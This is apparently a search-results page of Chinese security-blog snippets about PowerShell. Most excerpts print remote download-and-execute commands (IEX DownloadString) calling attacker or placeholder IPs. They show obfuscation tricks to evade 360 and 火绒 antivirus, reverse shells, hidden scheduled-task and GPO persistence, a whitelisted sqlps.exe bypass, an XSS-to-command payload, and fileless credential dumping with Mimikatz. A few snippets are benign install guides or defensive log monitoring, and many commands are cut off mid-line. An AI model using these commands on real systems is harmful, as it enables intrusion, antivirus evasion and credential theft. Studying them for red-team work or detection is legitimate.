  • From the column 七夜安全博客

    Thoughts on APT: advanced PowerShell command obfuscation and evasion

    Invoke-Expression (New-Object System.Net.WebClient).DownloadString(('ht'+'tp:'+'//127.0'+'.0.1:88'+'9 Invoke-Expression (New-Object System.Net.WebClient).DownloadString(("{0}{4}{1}{6}{3}{7}{2}{8}{5}"-f ' DownloadString"("http://127.0.0.1:8899/qiye.txt") 3.4 Invoke: Invoke really should not go here, but there was no better place for it, so it goes here. ("DownloadString").Invoke("http://127.0.0.1:8899/qiye.txt") 4. Variable transformations 4.1 Concatenation and replacement: split the keyword into several variables, then replace and concatenate. ") 4.2 Dynamic variable generation: taking the construction of DownloadString as an example, DownloadString is located by enumerating methods and fuzzy matching, using PsObject.Methods and Where-Object.

    7.1K · 5 · 2 · Published on 2020-06-05
  • From the column 潇湘信安

    Tips for evading 360 and 火绒 in PowerShell

    PowerShell AV evasion: bypassing 360 and 火绒 to get a session online. Reference for the PowerShell evasion approach: 安全客 original payload Invoke-Expression (New-Object Net.WebClient).DownloadString ('http:9821.ink/xxx') Split "http" and join with +: Invoke-Expression(New-Object Net.WebClient).DownloadString("ht"+"tp ://9821.ink/xxx") Substitute variables: IEX$wc=New-Object Net.WebClient;$wc.DownloadString('h'+'ttp://9821.ink/xxx') Original command: powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.12.20 DownloadString"('ht‘+’tp://192.168.12.20:80/a')" As the modified command shows, replacing the executed command and splitting "http" and joining it with + is enough to evade detection and get a session online.

    2.3K · 3 · 1 · Published on 2021-07-28
  • From the column 潇湘信安

    Abusing the sqlps.exe whitelist (bypassing S60!)

    exploit(multi/handler) > exploit Getting a session online via sqlps: SQLPS -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring Blocked: powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.120 /360.ps1'))" SQLPS -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.120 Bypass: SQLPS1 -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.120/ 360.ps1'))" cmd /c SQLPS -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.120

    1.5K · 1 · 0 · Edited on 2022-04-01
  • From the column 中国白客联盟

    Commonly used PowerShell in penetration testing (Part 1)

    whoami desktop-ej8rt6l\jumbo Export RDP/WinSCP/PuTTY/FileZilla sessions and passwords powershell IEX (New-Object Net.WebClient).DownloadString /SessionGopher.ps1');Invoke-SessionGopher -Thorough Dump passwords powershell "IEX (New-Object Net.WebClient).DownloadString NC reverse shell powershell "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com Copy system/ntds powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com nishang/master/Gather/Copy-VSS.ps1'); Copy-VSS" Retrieve passwords saved by browsers powershell "IEX (New-Object Net.WebClient).DownloadString

    2.1K · 4 · 0 · Published on 2019-03-07
  • From the column 信安之路

    Maintaining system privileges with scheduled tasks

    powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring

    1.4K · 3 · 0 · Published on 2021-05-27
  • From the column FreeBuf

    PowerShell AV evasion from first steps to practice

    We can mix the two approaches to achieve a simple bypass, e.g.: echo Invoke-Expression(new-object net.webclient).downloadstring('http://xxx.xxx.xxx /a') | powershell - e.g.: powershell -c "IEX(New-Object Net.WebClient).DownloadString('d://a')" Simple obfuscation powershell ('http://xxx.xxx.xxx/a') Handling downloadstring: use escape characters "Down`l`oadString" Handling http: split http across variables powershell "$a ='((new-object net.webclient).downloadstring(''ht';$b='tp://109.xx.xx.xx/a''))';IEX ($a+$b)" Split with Chinese single quotes DownloadString"('ht‘+’tp://xx.xx.xx/a')" One more small tip: when testing against certain antivirus products, we found that operations under cmd are scanned more strictly, while the PowerShell environment is comparatively easier

    3.3K · 3 · 0 · Published on 2021-03-09
  • From the column FreeBuf

    How to control objects managed by a Group Policy Object (GPO) through a user's edit permissions

    StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring "if %username%==<targetusername> powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring

    1.8K · 2 · 0 · Edited on 2023-04-26
  • From the column Ms08067安全实验室

    Achieving persistence with scheduled tasks

    powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring

    1.5K · 3 · 0 · Published on 2020-11-11
  • Installing wget on Windows 10 and a fix for "Could not create SSL/TLS secure channel"

    NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString Run the following code: @powershell -NoProfile -ExecutionPolicy Bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString

    244 · 1 · 0 · Edited on 2026-01-23
  • From the column Bypass

    Several ways to maintain privileges with scheduled tasks

    powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring

    3.3K · 2 · 0 · Published on 2019-11-07
  • From the column 网络安全攻防

    Various ways to get a reverse shell on Windows

    python2 -m SimpleHTTPServer 1234 Step 3: the target machine sends back a cmd shell powershell IEX (New-Object System.Net.Webclient).DownloadString Host the file with Python python2 -m SimpleHTTPServer 1234 Step 3: reverse shell operation powershell IEX (New-Object Net.WebClient).DownloadString Host the file with Python python2 -m SimpleHTTPServer 1234 Step 3: reverse shell operation powershell IEX (New-Object Net.WebClient).DownloadString 192.168.204.144 192.168.204.145 #start listening Step 3: reverse shell operation powershell IEX (New-Object Net.WebClient).DownloadString

    2.2K · 1 · 1 · Edited on 2025-01-07
  • From the column FreeBuf

    How to bypass antivirus in practice and obtain account passwords with mimikatz

    An unobfuscated file uploaded to the host is killed immediately with a pop-up, so remote loading is used to bypass it: remote loading runs mimikatz in memory with no file written to disk, which is how it evades the AV powershell "IEX (New-ObjectNet.WebClient).DownloadString Once it has flagged a PowerShell download attack, it denies access to PowerShell outright for a while; in practice just run the command below) powershell "IEX (New-ObjectNet.WebClient).DownloadString Load into memory and read account passwords filelessly to bypass the AV (the way around the PowerShell download-attack pop-up is the same as above); the command is as follows powershell.exe -exec bypass IEX (New-ObjectNet.WebClient).DownloadString

    2K · 2 · 0 · Published on 2020-04-24
  • From the column betasec

    Reverse shell | Summary of reverse shells

    Attacker listens: Nc –lvnp Target sends back CMD: powershell IEX (New-Object System.Net.Webclient).DownloadString('https:// powercat -c 192.168.1.4 -p -e cmd Or run the following code on the attacker side: powershell IEX (New-Object System.Net.Webclient).DownloadString hash value ...... 2.2.1 TCP-based interactive PowerShell shell Run the following code on the target machine: powershell IEX (New-Object Net.WebClient).DownloadString 9999 Note: nishang can be downloaded to the attacker's local machine and the following code run (a simple web server built with Python is recommended here): powershell IEX (New-Object Net.WebClient).DownloadString 192.168.1.18:9889/test step 3: run the PowerShell download script on the target machine powershell IEX (New-Object System.Net.Webclient).DownloadString

    4.1K · 2 · 1 · Edited on 2022-12-11
  • From the column FreeBuf

    Octopus: a pre-operation C2 server for security research, designed for red teams

    generate_powershell operation1 #==================== 1) powershell -w hidden "IEX (New-Object Net.WebClient).DownloadString 192.168.178.1:8080/page.php');" 2) powershell -w hidden "Invoke-Expression (New-Object Net.WebClient).DownloadString ('http://192.168.178.1:8080/page.php');" 3) powershell -w hidden "$w = (New-Object Net.WebClient).DownloadString e.g. powershell -w hidden "Add-Type -AssemblyName System.Core;IEX (New-Object Net.WebClient).DownloadString

    1.1K · 1 · 0 · Edited on 2023-03-30
  • From the column betasec

    Study notes on reverse shells - Part 1

    Attacker listens: Nc –lvnp 9999 Target sends back CMD: powershell IEX (New-Object System.Net.Webclient).DownloadString('https Or run the following code on the attacker side: powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com hash value ...... 2.2.1 TCP-based interactive PowerShell shell Run the following code on the target machine: powershell IEX (New-Object Net.WebClient).DownloadString Note: nishang can be downloaded to the attacker's local machine and the following code run (a simple web server built with Python is recommended here): powershell IEX (New-Object Net.WebClient).DownloadString 2.2.2 UDP-based interactive PowerShell shell powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com

    1.4K · 2 · 1 · Published on 2020-07-31
  • From the column betasec

    Internal network penetration | The most practical reverse shell summary on the web

    system32\cmd.exe #run on the target host (2) PowerShell reverse shell PS C:\WWW> powershell IEX (New-Object System.Net.Webclient).DownloadString The target machine runs the PowerShell payload (5) nishang reverse shell Reverse TCP shell: powershell IEX (New-Object Net.WebClient).DownloadString Reverse -IPAddress 10.1.1.210 -port 1234 Reverse UDP shell: powershell IEX (New-Object Net.WebClient).DownloadString host=xx.xx.xx.xx" --no-cache -e open -e open Target host: powershell IEX (New-Object System.Net.Webclient).DownloadString

    2.1K · 1 · 0 · Edited on 2022-12-11
  • From the column 全栈程序员必看

    Installing yarn on Windows [worth bookmarking]

    NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString powershell.exe Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString

    958 · 3 · 0 · Edited on 2022-08-27
  • From the column Khan安全团队

    XMind 2021 11.0 Beta 1 XSS vulnerability leading to command execution

    toString())'> Reverse shell command: CS generates a PowerShell script powershell.exe -nop -w hidden -c "IEX((new-objectnet.webclient).downloadstring )" require('child_process').exec('powershell.exe-nop -w hidden -c "IEX ((new-objectnet.webclient).downloadstring

    869 · 2 · 0 · Published on 2021-05-28
  • From the column FreeBuf

    How to use logs to monitor and restrict PowerShell attack activity

    Among these, the following two methods are used fairly frequently: −(New-object System.net.webclient).DownlodFile() −(New-object System.net.Webclient).DownloadString Beyond these, there are many more examples of using PowerShell to download and invoke malicious content: (New-object System.net.Webclient).DownloadString() DownloadString An attack sample from a real-world scenario is given below: this sample uses both the DownloadString() and DownlodFile() methods, and its DownloadString() method downloads PHP code from a remote host.

    3K · 5 · 0 · Published on 2018-02-26
  • From the column Gamma安全实验室

    Red team tips - exporting credentials and passwords

    "sekurlsa::logonpasswords full" exit powershell: #read plaintext passwords powershell IEX (New-Object Net.WebClient).DownloadString Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCerts #read hashes powershell IEX (New-Object Net.WebClient).DownloadString Prerequisites: PowerShell, administrator privileges or higher Command: powershell “IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com

    2.8K · 1 · 0 · Published on 2021-03-10